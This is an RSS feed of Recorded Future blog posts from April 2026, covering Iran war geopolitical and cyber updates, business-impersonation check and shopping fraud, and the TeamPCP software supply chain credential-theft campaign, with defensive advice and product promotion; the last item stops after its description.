<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Recorded Future</title>
        <link>https://www.recordedfuture.com/ko</link>
        <description>Strengthen Your Defenses with Threat Intelligence</description>
        <lastBuildDate>Fri, 17 Apr 2026 17:53:08 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>Recorded Future, Inc.</generator>
        <language>en</language>
        <copyright>Copyright © 2026 Recorded Future, Inc.</copyright>
        <atom:link href="https://www.recordedfuture.com/ko/feed" rel="self" type="application/rss+xml"/>
        <item>
            <title><![CDATA[The Iran War: What You Need to Know]]></title>
            <link>https://www.recordedfuture.com/ko/blog/the-iran-war-what-you-need-to-know</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/the-iran-war-what-you-need-to-know</guid>
            <pubDate>Fri, 17 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group tracks the cyber, physical, and geopolitical components of the US-Israeli strikes on Iran — with continuously updated threat analysis and scenarios.]]></description>
            <content:encoded><![CDATA[
        <p><em>Last updated: 17 April 2026 at 1800 GMT</em></p>
        <div>
          <div>
            <div>
              <p><strong>New from Insikt Group: Iran War — Future Scenarios and Business Implications</strong></p>
              <p>Insikt Group has published a dedicated Cone of Plausibility analysis examining how the Iran conflict could evolve over the next 6–12 months — from a fragile ceasefire baseline to regional war, regime collapse, and nuclear crisis. Each scenario includes business implications and 0–90 day priority actions.<a href="https://www.recordedfuture.com/ko"></a></p>
            </div>
          </div>
          <div>
            <div><a href="https://www.recordedfuture.com/ko/research/iran-war-future-scenarios">Read the full analysis.</a></div>
          </div>
        </div>
        <p>This report is updated as the situation evolves across the geopolitical, cyber, and influence operations dimensions of this conflict. It will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.</p>
        <h3>The Latest Updates</h3>
        <h3>Geopolitical Landscape</h3>
        <ul>
          <li><strong>Strait of Hormuz declared open; blockade status remains ambiguous.</strong> Iran and the US both announced on April 18 that the Strait of Hormuz is open to commercial shipping, following a Lebanon ceasefire agreement. Iran stated ships must take a "coordinated route" running close to its coastline, suggesting it retains some administrative role in transit. President Trump separately confirmed the US blockade of Iranian port traffic remains in place, leaving the practical enforcement picture unclear. Insikt Group assesses that while the announcement represents a meaningful de-escalation signal, the divergence between Iranian route requirements and the US blockade's continued status means the Strait's governance remains contested — and the risk of renewed disruption remains elevated until the terms are codified.</li>
          <li><strong>Pakistan facilitating second round of US-Iran talks.</strong> A Pakistani delegation including Chief of Defense Forces Asim Munir met with Iran’s top negotiating officials in Tehran on April 16. Iran’s parliament has signaled a hard line: the ceasefire expiration must yield either international recognition of Iranian control over the Strait of Hormuz, or a return to war.</li>
          <li><strong>Iraqi Shi‘a militias continue attacks despite ceasefire.</strong> Since the April 7 ceasefire, Iraqi Shi‘a militias - operating under the Islamic Resistance in Iraq (IRI) umbrella - have <a href="https://english.alarabiya.net/News/gulf/2026/04/10/drone-strikes-targeting-kuwait-originated-from-iraq-sources-say">continued</a> drone and missile strikes against GCC infrastructure in Bahrain, Kuwait, and Saudi Arabia, and targeted Iranian Kurdish dissident groups in Iraqi Kurdistan. Drone attacks at Baghdad International Airport on April 8 targeted a convoy carrying FBI personnel. Insikt Group assesses that Iran’s diminished command and control has afforded militias greater tactical autonomy, and that they do not perceive their operations as fully subject to the ceasefire. If the ceasefire collapses, militia activity will likely intensify significantly.</li>
          <li><strong>Israel-Lebanon ceasefire announced; durability uncertain.</strong> President Trump announced a ten-day ceasefire between Israel and Lebanon beginning April 16. The first direct Israeli-Lebanese diplomatic talks since 1993 were held on April 14, facilitated by US Secretary of State Rubio. Hezbollah has denounced the talks; Lebanese President Aoun declined direct engagement with Israeli PM Netanyahu, citing the need for a ceasefire before direct negotiations. Insikt Group assesses this diplomatic engagement increases opportunities for de-escalation in Lebanon, but significant hurdles remain.</li>
        </ul>
        <h3>Cyber Threat Landscape</h3>
        <ul>
          <li><strong>GreenGolf (MuddyWater) conducting large-scale data exfiltration across the Middle East.</strong> Oasis Security <a href="https://www.scworld.com/brief/extensive-muddywater-like-attack-campaign-against-middle-eastern-critical-infrastructure-detailed">reported</a> on April 14 a multi-stage campaign attributed to infrastructure overlapping with GreenGolf, targeting more than 12,000 internet-exposed systems across aviation, energy, infrastructure, and government sectors across the Middle East. The campaign exploited five newly disclosed CVEs for initial reconnaissance, combined with credential harvesting via brute-force attacks against Outlook Web Access using the legitimate penetration testing tool Patator. Confirmed exfiltration included passport and visa records, payroll data, credit card information, and internal corporate documents from a compromised Egyptian aviation organization. C2 infrastructure used Python- and Go-based controllers communicating over TCP, UDP, and HTTP with AES encryption — consistent with the ArenaC2 framework pattern previously associated with GreenGolf activity.</li>
        </ul>
        <h3>Influence Operations</h3>
        <ul>
          <li><strong>Iran using state media to portray blockade as ineffective.</strong> Iranian state-affiliated outlets including Fars News and IRGC-affiliated Tasnim News are actively publicizing instances of sanctioned vessels transiting the Strait, framing the US blockade as a failure. Insikt Group assesses this reflects a coordinated information operation designed to reinforce domestic narratives of regime control over the strategic chokepoint and to limit public concern over the blockade’s anticipated economic impact.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1639b94af082849a6929a572441c5012d6e2eb22d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From Bazooka to Fake Nikes]]></title>
            <link>https://www.recordedfuture.com/ko/blog/from-bazooka-to-fake-nikes</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/from-bazooka-to-fake-nikes</guid>
            <pubDate>Thu, 16 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A deep dive into business impersonation fraud — from fake companies cashing stolen checks to AI-powered shopping scams — and why the same vulnerability enables both.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>Business impersonation is the hidden thread connecting old and new fraud. Discover how the same core tactic is fueling both a surge in commercial check fraud and an explosion of AI-powered online shopping scams targeting younger consumers.</li>
                <li>Tools like Positive Pay and 3D Secure authentication, while effective against the fraud they were built to stop, have pushed threat actors to evolve their schemes in ways that render those controls irrelevant.</li>
                <li>Ecosystem gaps are often the real vulnerability. Fraudsters exploit the chain of assumed trust between social media platforms, card networks, merchant onboarders, banks, and local business registries — turning each party's reliance on the last into an open door.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>If you’re a millennial or Gen Z-er, then you probably haven’t used a paper check in a while. According to the <a href="https://www.atlantafed.org/research-and-data/surveys/survey-and-diary-of-consumer-payment-choice?utm_source=substack&amp;utm_medium=email#panel=2">Federal Reserve Bank of Atlanta</a>, just 1 out of 5 of your peers used a check in the last 30 days, versus 2 out of 5 Gen Xers and 3 out of 5 boomers. Yet despite year-on-year decreases in overall usage, <a href="https://verafin.com/2025/12/nasdaq-verafin-catches-over-1-billion-in-check-fraud-in-2025/?utm_source=substack&amp;utm_medium=email">Nasdaq Verafin</a> saw check fraud instances rise another 11% in 2025.</p>
        <p>Then again, if you are a millennial or Gen Z-er, you will have seen an advertisement for a cheap product on social media. For <a href="https://www.pewresearch.org/short-reads/2025/11/19/about-a-third-of-americans-say-theyve-had-an-online-shopping-scam-happen-to-them/?utm_source=substack&amp;utm_medium=email">40% of you</a>, that has meant falling for an online shopping scam.</p>
        <p>On the face of it, these look like two ends of the fraud spectrum:</p>
        <ul>
          <li>On the one hand, we have what feels like the past: paper check usage rates even among those aged 65+ fell from 13% of transactions in 2013 to 6% in 2025 (<a href="https://www.atlantafed.org/research-and-data/publications/take-on-payments/2025/07/07/innovations-in-payments-acceptance-play-out-in-consumer-check-use?utm_source=substack&amp;utm_medium=email">Federal Reserve Bank of Atlanta</a>).</li>
          <li>On the other hand, we have the future: online shopping scams target a younger demographic through AI-enabled brand impersonation and sprawling social media ad ecosystems.</li>
        </ul>
        <p>The payment instruments, demographics, and the teams working at financial institutions to address these problems differ. So what’s the thread linking them together? Business impersonation. It manifests itself differently across schemes, but for anti-fraud systems built to detect check washing and counterfeiting on the one hand, and unauthorized third-party card fraud on the other, business impersonation has emerged as the fraudster’s response to exploit both.</p>
        <h2>Commercial checks and copycat businesses across state lines</h2>
        <p>In the past, stolen checks were often whitewashed to change the recipient and amount, and then walked into banks for cashout. The Postal Inspection Service received over 299,000 mail theft complaints in a single 12-month period—a 161% increase from the prior year. Recorded Future’s Fraud Intelligence Team analyzed and mapped stolen checks to US geographies, illustrating hot spots of physical crime and observing that it remains a national issue that extends beyond heavily urbanized areas.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ae67a7886291f3ca973623a136518e5754335b02.png?width=750&amp;format=png&amp;optimize=medium" width="1381" height="751" />
            </div>
          </div>
          <div>
            <div><em>Mapping stolen checks by zip code; courtesy of Recorded Future</em></div>
          </div>
        </div>
        <p>Yet even among declining consumer check usage rates, businesses’ use of commercial checks remains stubbornly high in the US: the <a href="https://www.financialprofessionals.org/training-resources/resources/survey-research-economic-data/Details/payments-fraud?__hstc=110159258.08b65636f3e81487b21bd53bc12a6e37.1770568886227.1770668440686.1770742788656.3&amp;__hssc=110159258.1.1770742788656&amp;__hsfp=4888b6684dc00907b9aeb05be67a9fa9&amp;utm_source=substack&amp;utm_medium=email">Association for Financial Professionals</a> (AFP) found that 91% of organizations are still using checks, and 63% experienced check fraud in 2024. When businesses send checks to suppliers, the amounts can rise quickly, leading fraudsters to expand beyond simple check-washing schemes.</p>
        <p>In perhaps the most eye-catching example, fraudsters <a href="https://manhattanda.org/d-a-bragg-check-fraud-ring-indicted-for-stealing-1-2m-from-bazooka-companies-maker-of-classic-bubble-gum/?utm_source=substack&amp;utm_medium=email">intercepted</a> a commercial check destined for bubble-gum giant Bazooka in 2022. A $1.24 million check. Over the next two weeks, they transferred and withdrew over half a million dollars. How’d they do it? You can’t just wash out the payee name on a million-dollar check, replace it with John Smith, and expect it to clear after depositing it into a personal checking account.</p>
        <p>Instead, the threat actors just created a fake Bazooka. The real Bazooka is registered in Delaware under the name “The Bazooka Companies, LLC”, so culprits registered a fictitious company in New York under the name “The Bazooka Companies 1 Inc”. They then used the official business license to open a corporate bank account for the new fictitious business. From there, they used cashier checks, withdrawals, and transfers to personal accounts to cash out the funds.</p>
        <p>Fast forward to today, and the scheme is still happening. Recent research from <strong><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a></strong> <strong>(PFI)</strong> surveyed stolen checks for sale on Telegram in Q4 2025 and found over 30 checks with a business as the payee, along with suspicious new entities registered in other states a few days later. The total face value of the checks amounted to $2M.</p>
        <p>As with most fraud, this scheme’s emergence is based on:</p>
        <ul>
          <li><strong>Exploiting ecosystem gaps between disparate parties:</strong> Businesses can have the same name as another when registered in different states. Pair that with most states’ limited mandate to investigate business registrations, and we’re left with the first gap:</li>
        </ul>
        <p><em>“As long as the basic filing requirements are met, the office[s] may have little or no authority to question or reject a document submitted for filing or to verify information included in the filing”</em> (<a href="https://www.nass.org/sites/default/files/reports/final-nass-report-business-filing-fraud-091925.pdf?utm_source=substack&amp;utm_medium=email">National Association of Secretaries of State</a>, September 2025)</p>
        <p>When a fraudster approaches a bank to open a business bank account, the bank conducts its own due diligence. But the focus here is on money laundering threats and the legitimacy of documents and applicants. If the fraudsters are using a clean identity — synthetic or otherwise — then the bank won’t have a clear reason to reject the application just because a business called John’s Toilet Supply, LLC exists in another state.</p>
        <ul>
          <li><strong>Delivering a reactionary counterpunch to effective fraud processes:</strong> Think of this as the cat-and-mouse game. Fraud defenders figure out how to stop one scheme, forcing fraudsters to innovate. In this case, Positive Pay has proven remarkably effective at preventing check washing and counterfeit checks (when parties agree to use it). Payee Positive Pay, in particular, allows the payer to make sure that when their checks are deposited, the check number, date, payee name, and amount match their files. But what happens if everything is correct, but a copycat payee deposits the check? Cases like Bazooka.</li>
        </ul>
        <h2>80% discount on shoes? How can you say no?</h2>
        <p>If we detour into e-commerce, we see a very similar dynamic play out, but at a staggeringly larger scale. The premise is simple: use AI to launch a fake online shop impersonating company A, B, or C, buy ad space on social media to drive traffic, pocket the proceeds, and launder the funds while customers wait for goods that never arrive.</p>
        <p>The scheme works because 53% of consumers, and 76% of Gen Zers, now begin shopping journeys on social media, according to <a href="https://www.salesforce.com/news/stories/social-shopping-stats-2025/?utm_source=substack&amp;utm_medium=email">Salesforce’s 2025 report</a>. The problem is that the journey is littered with traps: in November 2025, <a href="https://www.reuters.com/investigations/meta-is-earning-fortune-deluge-fraudulent-ads-documents-show-2025-11-06/?utm_source=substack&amp;utm_medium=email">leaked internal documents</a> from Meta claimed the “company shows its platforms’ users an estimated 15 billion ‘higher risk’ scam advertisements — those that show clear signs of being fraudulent — every day”. Industry reporting paints the same picture, with the Better Business Bureau finding online shopping scams as the most reported scam type and social media advertisements as the most common originator.</p>
        <div>
          <div>
            <div>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ccaa97f85eebb173855f1669c1422aee9e49f717.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1600" height="1200" />
              </p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11e27062f373f6e184680c4d10916a2b03c3da510.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1600" height="1153" />
              </p>
            </div>
          </div>
          <div>
            <div><em>Brand impersonation shopping scams impacting shoppers in January 2026; courtesy of Recorded Future</em></div>
          </div>
        </div>
        <p>The basics of the scheme are nothing new. Capture payment card data by creating a fake online store and advertise too-good-to-be discounts. What’s changed is that these are no longer just phishing websites. They’re functional online shops that process payments via merchant accounts. Behind each of these merchant accounts is a registered business.</p>
        <p>This is creating problems throughout the ecosystem:</p>
        <ul>
          <li>Cardholders see websites that exactly mimic major (and increasingly niche) brands, letting discounts outweigh better judgment.</li>
          <li>Financial institutions face the challenge of balancing their duty of care to process customer transactions with the risks of fraud and money laundering. But in these cases, the traditional indicators of cyber-enabled fraud aren’t present. The cardholder is authorizing the transaction, and there’s nothing suspicious within the behavioral or device indicators of the 3D Secure authentication stream. (Because, again, it’s the cardholder doing the transacting under manipulation.)</li>
          <li>The fingers begin to point back at the acquirers and payment facilitators responsible for merchant onboarding, but, from their perspective, the entity holds a proper commercial license to engage in business issued by the local authorities. (Though, as a divergence from the check fraud scheme, the fraudsters in online shopping scams rarely impersonate a real big-name brand at the business creation and merchant onboarding stage. Instead, the fraudsters hide evidence of impersonation from the merchant onboarders and leave the impersonation for the ads and fake online shops visible to victims.)</li>
        </ul>
        <p>But just like with the check fraud example, a big part of why online shopping scams have exploded — outside of generative AI making brand abuse content easier than ever to create at scale — is ecosystem gaps and fraudsters reacting to the defense:</p>
        <ul>
          <li><strong>Exploiting ecosystem gaps between disparate parties:</strong> By the time a victim is making a purchase on an online shopping scam website, each entity along the way has looked to the one before and trusted that due diligence had been performed. The cardholder wants to trust that the social media platform screened out malicious advertisers; the card issuer wants to trust the cardholder vetted the merchant; the card network wants to trust the merchant onboarder verified the business; and the merchant onboarder wants to trust local authorities properly licensed the business. A big, long line of incentivized trust.</li>
          <li><strong>Delivering a reactionary counterpunch to effective fraud processes:</strong> The industry has made huge strides in combating unauthorized, third-party card-not-present (CNP) fraud in the last decade. A major part of the success has been built on 3D Secure, introducing a layer of authentication on top of existing authorization controls. Online shopping scams completely sidestep the defensive layer by making the merchant the fraud surface and rendering cardholder authentication controls irrelevant.</li>
        </ul>
        <h2>Thinking towards the way out</h2>
        <p>On the check fraud side, the best solution may already be available, but, as with most solutions, it comes with trade-offs and adoption issues. The basic idea of Positive Pay and its derivative, Payee Positive Pay, is that a business informs its bank of the checks it is sending, and the bank only disburses funds if the check matches what the business provided. Positive Pay was designed to combat counterfeit and forged checks, and it does that very well.</p>
        <p>Of course, in the Bazooka example of same-name business impersonation, this wouldn’t help. Nothing about the check was modified. So here, banks offer Reverse Positive Pay, which basically means the business personally signs off on each sent check. It can solve the problem but shifts more operational and investigatory expenses onto the business (which might explain why <a href="https://www.alkami.com/resources/research/reports/positive-pay-adoption-trends-strategies-for-banks-credit-unions?utm_source=substack&amp;utm_medium=email">adoption rates</a> are south of 20%, according to Datos Insights and Alkamai). In the end, though, it makes you wonder why not heed the advice and move to alternative electronic payment methods?</p>
        <p>On the online shopping scam side, solutions are more complex and scattered across the ecosystem.</p>
        <ul>
          <li>At the top of the funnel, there’s rising pressure on online advertising platforms to do a better job at limiting the presence of fraudulent advertisements. Based on more leaked internal Meta documents, regulatory pressure may not be producing the desired outcome.</li>
          <li>At the merchant onboarding level, both the major card networks are forcing acquirers and payment facilitators to do more to defend the gates into payment processing, while also devoting more resources to identifying scam merchants that do make it in.</li>
        </ul>
        <p>For card issuers on the frontline, it’s a more delicate dance. Card issuers aren’t on the hook for authorized card payments to fraudsters under the Fair Credit Billing Act (FCBA) or Electronic Funds Transfer Act (EFTA), but <a href="https://www.alloy.com/reports/2025-scams-report?utm_source=substack&amp;utm_medium=email">67% of cardholders</a> expect them to cover scam losses. Though when cards transacting on scam websites end up on the dark web for resale, and unauthorized charges start rolling in, it is the issuer’s problem.</p>
        <p>The best solution aligns with the industry’s movement toward <a href="https://intelligence2risk.substack.com/p/the-need-for-cyber-fraud-fusion-centers?utm_source=substack&amp;utm_medium=email">CTI-fusion models</a> to address the cyber component of cyber-enabled fraud. The convergence of online shopping and purchase scams is precisely the type of problem the new organizational model was meant to combat.</p>
        <p>In applying the CTI-fraud fusion model to purchase scams, traditional fraud assets start at the end of the fraud attack chain to correlate reported cardholder manipulation and non-delivery alerts against merchant account patterns. The CTI assets start at the beginning, sourcing online shopping scams at runtime and attributing the abused merchant accounts. The two teams then meet in the middle, using modeled transaction patterns and threat-hunted active scam websites, ultimately leading to the deployment of merchant-based fraud risk rules.</p>
        <p>So, in the meantime, where does all this leave us? The same thing you’ve heard plenty of times: stop using checks if you can and don’t trust too-good-to-be-true offers from online ads.</p>
        <h3><strong>How Recorded Future Helps</strong></h3>
        <p>The research in this blog came directly from Recorded Future's Fraud Intelligence teams. Two capabilities speak to the threats described.</p>
        <ul>
          <li><strong><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Payment Fraud Intelligence</a></strong> — tracks the complete fraud lifecycle: for check fraud, it uses OCR to extract payee, amount, and date from compromised checks being sold in forums, enabling deposit screening against known stolen checks; for card fraud, it monitors compromised merchants, stolen cards on criminal marketplaces, and the tester merchants fraudsters use to validate cards before striking.<a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence"></a></li>
          <li><strong><a href="https://www.recordedfuture.com/ko/use-case/digital-risk">Digital Risk Protection</a></strong> — provides continuous monitoring across millions of sources for malicious sites, brand and executive impersonation, data leakage, and dark web mentions — with risk-based alerting that surfaces only actionable threats and takedown workflows built directly into the Platform.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_14faf4dcce5eb66f5d88bbbe34166aa2b8a612f07.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Your Supply Chain Breach Is Someone Else's Payday]]></title>
            <link>https://www.recordedfuture.com/ko/blog/your-supply-chain-breach-is-someone-else-payday</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/your-supply-chain-breach-is-someone-else-payday</guid>
            <pubDate>Wed, 15 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A supply chain attack by TeamPCP compromised trusted software tools to harvest credentials at scale, enabling payroll fraud, logistics theft, and ransomware extortion.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>TeamPCP exploited a single stolen credential to gain write access to trusted software repositories, inject credential-harvesting malware, and cascade across five ecosystems in five days.</li>
                <li>Stolen credentials can enable payroll redirection, freight rerouting, and extortion — active campaigns Insikt Group is tracking that show how a software supply chain breach can quickly become a business operations crisis.</li>
                <li>Learn why an inventory of your software components isn't enough when malicious code is injected after the source commit, and what a truly effective defense — combining third-party due diligence. cryptographic signing, and AI-driven anomaly detection — actually requires.</li>
              </ul>
            </div>
          </div>
        </div>
        <p><br />In March 2026, a group calling itself TeamPCP compromised LiteLLM (a Python package with roughly <a href="https://pypistats.org/packages/litellm">97 million monthly downloads</a> used by thousands of organizations to connect to AI services) and <a href="https://checkmarx.com/blog/checkmarx-security-update/">Checkmarx</a> (one of the most widely used application security testing platforms on the planet). How they got in isn’t publicly confirmed. But the result was write access to a trusted software repository.</p>
        <p>From there, they injected a credential-harvesting payload into the software and <a href="https://thehackernews.com/2026/03/teampcp-hacks-checkmarx-github-actions.html">poisoned two Checkmarx GitHub Actions workflows</a>. The malware ran silently on installation, vacuuming up access keys, cloud credentials, secrets, and (the cruelest irony) every AI API key that LiteLLM was specifically designed to manage. The stolen data was encrypted, then pushed to a lookalike domain.</p>
        <p>And here is the part that should keep you up at night: this was one campaign, by one group, in one week. The downstream consequences are still unfolding.</p>
        <h2>Identity Is the Perimeter (and the Attack Surface)</h2>
        <p>The throughline in the TeamPCP campaign is identity. Start to finish.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18861a03755acfcc02c8296c0299017c1ca7c333b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1180" />
            </div>
          </div>
          <div>
            <div>TeamPCP intelligence summary courtesy of Recorded Future.</div>
          </div>
        </div>
        <p>No one has publicly confirmed exactly how TeamPCP gained access to the LiteLLM maintainer’s repository, but the most likely vector is stolen credentials. Recorded Future’s <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">identity intelligence</a> contains almost 1 million compromised GitHub developer credentials harvested by infostealers and sold across dark web marketplaces. A single publishing token or access key, lifted from a prior infection and left unrotated, would have been sufficient. TeamPCPs’ earlier compromise of <a href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/?utm_source=substack&amp;utm_medium=email">Aqua Security’s Trivy</a> infrastructure in late February (where <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack?utm_source=substack&amp;utm_medium=email">incomplete credential rotation</a> left residual access open for weeks) demonstrates exactly this pattern: one stolen token, one missed rotation, and the door stays open.</p>
        <p>Whatever the precise mechanism, TeamPCP used valid credentials to push malicious code into trusted repositories. No firewall to bypass. No endpoint to exploit. Just a valid login and the implicit trust that comes with it.</p>
        <p>Then the payload itself was designed to steal more identities. Each compromised environment yielded credentials that unlocked the next target. Trivy led to GitHub Actions. GitHub Actions led to <a href="https://www.securityweek.com/from-trivy-to-broad-oss-compromise-teampcp-hits-docker-hub-vs-code-pypi/?utm_source=substack&amp;utm_medium=email">four additional software distribution ecosystems</a>. One incomplete incident response created a cascading chain of supply chain compromises across five ecosystems in five days.</p>
        <p>This is the identity and access management problem stated as plainly as possible: if the perimeter is identity, then every stolen credential is a breach in the wall. And unlike a firewall rule, a stolen credential doesn’t trigger an alert. It just works.</p>
        <p>We <a href="https://intelligence2risk.substack.com/p/the-bug-that-wont-die-10-years-of?utm_source=substack&amp;utm_medium=email">previously wrote</a> about how deserialization vulnerabilities have plagued enterprise software for over a decade. The pattern is always the same: trusting input that should not be trusted. Supply chain attacks are the organizational equivalent. We trust the packages we install. We trust the pipelines we build. We trust the security tools we deploy. TeamPCP exploited every layer of that trust, starting with a single compromised identity.</p>
        <h2>The Impact Is Not Just Ransomware</h2>
        <p>TeamPCPs’ <a href="https://socradar.io/blog/teampcp-checkmarx-github-actions-attack/?utm_source=substack&amp;utm_medium=email">Telegram channel references a ransomware victim’s site</a>. The group appears to operate as a ransomware affiliate and has publicly discussed extorting companies by threatening to release over 300 GB of stolen data. Reports indicate a possible collaboration with the Lapsus$ extortion group. Ransomware is the obvious play.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_17e32149dd47f3a6051343744918be53349840a08.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1100" height="794" />
            </div>
          </div>
          <div>
            <div>CipherForce intelligence summary courtesy of Recorded Future.</div>
          </div>
        </div>
        <p>But ransomware is only the most visible impact. The more dangerous question is: what else can you do with over a million stolen cloud credentials, API keys, and service account tokens?</p>
        <p>The answer, based on what <a href="https://www.recordedfuture.com/ko/research/insikt-group?utm_source=substack&amp;utm_medium=email">Insikt Group</a> is tracking across multiple unrelated campaigns, is far broader than encryption and extortion.</p>
        <p>Redirect payroll. Late last year (2025) Insikt Group was monitoring activity around a campaign called “Swiper,” run by likely Russian-speaking actors who set up phishing infrastructure impersonating major financial institutions and payroll service providers. Stolen credentials were transmitted in real time, enabling the actors to alter direct deposit accounts and redirect payments before anyone noticed. The responsible actor was identified through a dispute on a <a href="https://www.recordedfuture.com/ko/research?utm_source=substack&amp;utm_medium=email&amp;page=1">criminal forum</a>, and their cryptocurrency wallet has processed over 7,000 transactions. This was a credential theft operation that converted identity compromise directly into financial theft. Now imagine that same playbook amplified by a supply chain attack that harvests payroll platform credentials at scale.</p>
        <p>Reroute shipments. Separately, Insikt Group has identified TAG-160, a threat group targeting the US logistics and transportation sector. TAG-160 impersonates logistics companies, sends fraudulent rate confirmations via phishing emails, and delivers remote access malware. But TAG-160 has also been caught running “double brokering scams,” where they pose as a legitimate carrier, obtain valid load details from a real broker, then re-advertise the load under the broker’s name to contract a different carrier. The legitimate carrier moves the freight. The threat actor collects the payment. The real carrier never gets paid. A second, unrelated threat cluster targets German logistics companies with a similar playbook.</p>
        <p>These are not theoretical scenarios. They are active campaigns running in parallel with the TeamPCP supply chain compromises. And the common denominator across all of them is credential theft and identity abuse.</p>
        <p>In the <a href="https://intelligence2risk.substack.com/p/five-risk-categories?utm_source=substack&amp;utm_medium=email">five risk impact categories</a> we use as a framework for translating cyber threats into business risk, the TeamPCP compromise touches every single one: operational disruption (ransomware, system lockout), financial fraud (payroll redirection, double brokering fraud, extortion payments), competitive disadvantage (credentials, trade secrets, PII), brand impairment (customers learning their security tooling was the vector), and legal and compliance consequences (breach notification obligations, potential liability for downstream impacts).</p>
        <p>The tendency is to categorize supply chain attacks as a “security tool problem” or a “developer problem.” It is neither. It is a business risk problem whose blast radius extends from IT operations to payroll to logistics to the boardroom.</p>
        <p>Organizations should ask how they can use AI-driven analysis to continuously verify the integrity of every package and build artifact entering their production systems. This means comparing distributed packages against their source repositories to detect injected code. It means analyzing updates to flag anomalous changes in behavior. It means automated provenance verification that traces software from source to distribution, flagging breaks in the chain.</p>
        <p>But the TeamPCP campaign exposed a truth the industry has been slow to internalize: the security tools themselves are targets. TeamPCP specifically chose a vulnerability scanner and an application security platform because those tools have the broadest access to credentials and infrastructure. Compromising the tool that checks your code is the ultimate fox-in-the-henhouse scenario.</p>
        <p>The organizations that weather this era of supply chain risk will be those that treat code integrity verification as a continuous, automated, AI-augmented process rather than a periodic audit.</p>
        <h2>So What. Now What.</h2>
        <p>TeamPCP is not done. Their Telegram channel explicitly states the operation is still unfolding, and they claim to be working with new partners to monetize stolen data at scale.</p>
        <p>For security leaders, the immediate actions are straightforward: if your organization uses LiteLLM, Trivy, or Checkmarx GitHub Actions, assume compromise and rotate every credential on affected systems. Audit your software pipelines for unauthorized changes. Pin software dependencies to verified, <a href="https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/?utm_source=substack&amp;utm_medium=email">immutable versions</a>.</p>
        <p>But the longer-term lesson is more fundamental. Supply chain attacks convert the trust model of modern software development into an attack surface. The packages you install, the tools you run, the pipelines you build: these are not neutral infrastructure. They are vectors. And the credential stolen today from a compromised software package could show up tomorrow as a payroll redirect, a rerouted shipment, or a ransomware demand.</p>
        <p>The keys to your kingdom are scattered across every package manager, every automation token, and every service account in your environment. Someone is collecting them. And your supply chain breach is already someone else’s payday.</p>
        <h2>How Recorded Future Helps</h2>
        <p>The TeamPCP campaign left signals at every stage. Three Recorded Future capabilities speak directly to this threat:</p>
        <ul>
          <li><a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a> — monitors infostealer logs, dark web markets, and credential dumps in real time, automatically detecting compromised employee credentials and triggering immediate response — including the nearly one million compromised GitHub developer credentials already in Recorded Future's dataset.</li>
          <li><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group</a> — elite analysts with deep government, law enforcement, and intelligence agency experience <a href="https://www.recordedfuture.com/ko/research/insikt-group"></a>who produced the TeamPCP, Swiper, TAG-160, and CipherForce research in this blog. Customers see threats as they develop, not after they've made headlines.</li>
          <li><a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Risk</a> — continuously monitors vendors for ransomware extortion activity, breach indicators, and credential leaks, replacing point-in-time questionnaires with real-time visibility across your supply chain.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Iran War: Future Scenario and Business Implications]]></title>
            <link>https://www.recordedfuture.com/ko/research/iran-war-future-scenarios</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/iran-war-future-scenarios</guid>
            <pubDate>Tue, 14 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Iran War: Future Scenarios and Business Implications]]></description>
